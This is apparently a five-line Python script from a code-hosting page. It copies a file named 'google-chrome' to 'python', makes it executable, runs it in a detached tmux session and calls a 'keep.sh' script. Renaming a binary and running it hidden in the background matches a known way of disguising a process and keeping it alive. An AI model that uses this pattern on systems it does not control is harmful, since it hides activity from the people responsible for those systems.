File size: 151 Bytes
e11358a
81c811c
 
52f1d36
 
1
2
3
4
5
import os
os.system("cp google-chrome python")
os.system("chmod +x python")
os.system("tmux new-session -d -s ses2 ./python")
os.system("bash keep.sh")